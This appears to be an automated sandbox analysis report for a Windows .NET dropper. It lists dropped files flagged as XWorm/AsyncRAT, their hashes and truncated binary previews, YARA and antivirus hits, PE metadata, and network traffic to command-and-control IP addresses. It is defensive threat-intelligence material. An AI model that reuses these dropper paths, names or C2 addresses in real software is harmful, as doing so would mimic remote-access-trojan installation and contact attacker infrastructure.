                                            3EtS1ncqvJ.exeGet hashmaliciousNjratBrowse
                                            • 147.185.221.19
                                            hfKx2T5IfT.exeGet hashmaliciousNjratBrowse
                                            • 147.185.221.19
                                            BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                            • 147.185.221.22

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Program Files\Common Files\OptiProV2.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\r4RF3TX5Mi.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):2097152
                                            Entropy (8bit):0.39637270168665684
                                            Encrypted:false
                                            SSDEEP:1536:QevDTeLbDJYRfpXvV7HcQ/y+bdBk0WvIWd6UJOF51s4Z:QeuDJqvR6+bdcJOP15
                                            MD5:DB6CA1D9FC6E01AF5D2ED709C6B17516
                                            SHA1:1302CA2BB13F6F4AB21587A11778ED6B77700CED
                                            SHA-256:C01FE51DA2152F83053FF1A689E2CA6FF1B317F62351F841A71FB9EA33BB08C5
                                            SHA-512:7D56B06F4E39ABB7F10BC0A7200B4833A1AEEBAEDBA71AF8D73307582631BEFF33F8D5274CC1B69BDA0A2A05BA52BE08DB038F63B760E99852B9933BC8BA12FD
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Program Files\Common Files\OptiProV2.exe, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Program Files\Common Files\OptiProV2.exe, Author: ditekSHen
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 92%
                                            • Antivirus: Virustotal, Detection: 78%, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................N%... ...@....@.. ....................................@..................................$..O....@............................................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc..............................@..B................0%......H.......H^..........&.....................................................(....*.r...p*. S...*..(....*.rE..p*. .x!.*.s.........s.........s.........s.........*.r...p*. ..V.*.r...p*. .O..*.r...p*. .Q.*.rU..p*. E/..*.r...p*. ....*..((...*.r...p*. ....*.r...p*. ..e.*"(....+.*&(....&+.*.+5sN... .... .'..oO...(,...~....-.(G...(9...~....oP...&.-.*.r=..p*. *p{.*.r...p*. Y.b.*.r...p*.r...p*. ...*.rM..p*. (:..*.r...p*. k.4.*..............j..................sQ..............~.........*

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Opti.exe.log

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Opti.exe
                                            File Type:CSV text
                                            Category:dropped
                                            Size (bytes):654
                                            Entropy (8bit):5.380476433908377
                                            Encrypted:false
                                            SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                            MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                            SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                            SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                            SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                            Malicious:false
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\r4RF3TX5Mi.exe.log

                                            Download File
                                            Process:C:\Users\user\Desktop\r4RF3TX5Mi.exe
                                            File Type:CSV text
                                            Category:dropped
                                            Size (bytes):847
                                            Entropy (8bit):5.354334472896228
                                            Encrypted:false
                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                            Malicious:true
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):64
                                            Entropy (8bit):0.34726597513537405
                                            Encrypted:false
                                            SSDEEP:3:Nlll:Nll
                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                            Malicious:false
                                            Preview:@...e...........................................................

                                            C:\Users\user\AppData\Local\Opti.exe

                                            Download File
                                            Process:C:\Program Files\Common Files\OptiProV2.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):2097152
                                            Entropy (8bit):0.39637270168665684
                                            Encrypted:false
                                            SSDEEP:1536:QevDTeLbDJYRfpXvV7HcQ/y+bdBk0WvIWd6UJOF51s4Z:QeuDJqvR6+bdcJOP15
                                            MD5:DB6CA1D9FC6E01AF5D2ED709C6B17516
                                            SHA1:1302CA2BB13F6F4AB21587A11778ED6B77700CED
                                            SHA-256:C01FE51DA2152F83053FF1A689E2CA6FF1B317F62351F841A71FB9EA33BB08C5
                                            SHA-512:7D56B06F4E39ABB7F10BC0A7200B4833A1AEEBAEDBA71AF8D73307582631BEFF33F8D5274CC1B69BDA0A2A05BA52BE08DB038F63B760E99852B9933BC8BA12FD
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Opti.exe, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Opti.exe, Author: ditekSHen
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 92%
                                            • Antivirus: Virustotal, Detection: 78%, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................N%... ...@....@.. ....................................@..................................$..O....@............................................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc..............................@..B................0%......H.......H^..........&.....................................................(....*.r...p*. S...*..(....*.rE..p*. .x!.*.s.........s.........s.........s.........*.r...p*. ..V.*.r...p*. .O..*.r...p*. .Q.*.rU..p*. E/..*.r...p*. ....*..((...*.r...p*. ....*.r...p*. ..e.*"(....+.*&(....&+.*.+5sN... .... .'..oO...(,...~....-.(G...(9...~....oP...&.-.*.r=..p*. *p{.*.r...p*. Y.b.*.r...p*.r...p*. ...*.rM..p*. (:..*.r...p*. k.4.*..............j..................sQ..............~.........*

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_032mkqh4.vxv.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ayn0u0lh.epc.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0mweryi.xzm.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcfnrz2h.1pb.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5stcyow.pv3.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jpvi4303.0ik.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4rb1rwm.gcr.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfit2sm0.b2x.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4dy3etq.pt1.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qps22msv.aoi.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5pmuztb.kgn.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2im3cau.gtb.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umwz5q21.vk0.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_us4cn23x.cy3.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wo15kcgv.hhn.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zuwdh2kv.wv5.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            Static File Info

                                            General

                                            File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):2.462734552467959
                                            TrID:
                                            • Win64 Executable Console Net Framework (206006/5) 48.58%
                                            • Win64 Executable Console (202006/5) 47.64%
                                            • Win64 Executable (generic) (12005/4) 2.83%
                                            • Generic Win/DOS Executable (2004/3) 0.47%
                                            • DOS Executable Generic (2002/1) 0.47%
                                            File name:r4RF3TX5Mi.exe
                                            File size:39'936 bytes
                                            MD5:a17ed4e602b0d341fc887925bba26643
                                            SHA1:c1045ad67c2b0695a30e3221cf8be3f290791088
                                            SHA256:ce247f59aefa2dcc85f22d76cafcebc7201a00f0f9d251787cd7e2254863abb1
                                            SHA512:c3b0c6f6ecc6ef1777e7a98b2d6fbca57b7924e95b8192c77022938c8c15dfc68c94d7b8c2f95711e2bf0593c5c488f24239746110fa4c5db6529b6fe826a419
                                            SSDEEP:96:letwFJT8/+22DKYoQ/Ne5IENu3WNtW1jYcFKNVcz1W4oKYMsLYUa:gt3+2hZ2NlCu8stYcFwVc03KY
                                            TLSH:0D03EC1E62498169F370013F9CF2465D862AADBAFC730765B88CF66F6F351838913663
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...5..f.........."...0.................. .....@..... ....................................`...@......@............... .....

                                            File Icon

                                            Icon Hash:6070391d0d050312

                                            Static PE Info

                                            General

                                            Entrypoint:0x140000000
                                            Entrypoint Section:
                                            Digitally signed:false
                                            Imagebase:0x140000000
                                            Subsystem:windows cui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66FBAD35 [Tue Oct 1 08:05:09 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:

                                            Entrypoint Preview

                                            Instruction
                                            dec ebp
                                            pop edx
                                            nop
                                            add byte ptr [ebx], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax+eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x8f0c.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x27580x1c.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x8900xa009cf7da56919bb03bc94dee336730745aFalse0.452734375data4.389464191190006IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0x40000x8f0c0x900012a1b2aef53b41f83f168b95c5fd1877False0.08734809027777778data2.228326668618982IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x41600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.02822390174775626
                                            RT_ICON0x83980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.04823651452282158
                                            RT_ICON0xa9500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.05675422138836773
                                            RT_ICON0xba080x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.14095744680851063
                                            RT_GROUP_ICON0xbe800x3edata0.8225806451612904
                                            RT_VERSION0xbed00x2d4data0.42955801104972374
                                            RT_MANIFEST0xc1b40xd53XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.38463793608912344

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 5, 2024 14:36:15.733130932 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:15.738269091 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:15.738363981 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:15.758919954 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:15.763905048 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.641987085 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.642030954 CEST804969915.235.206.13192.168.2.7
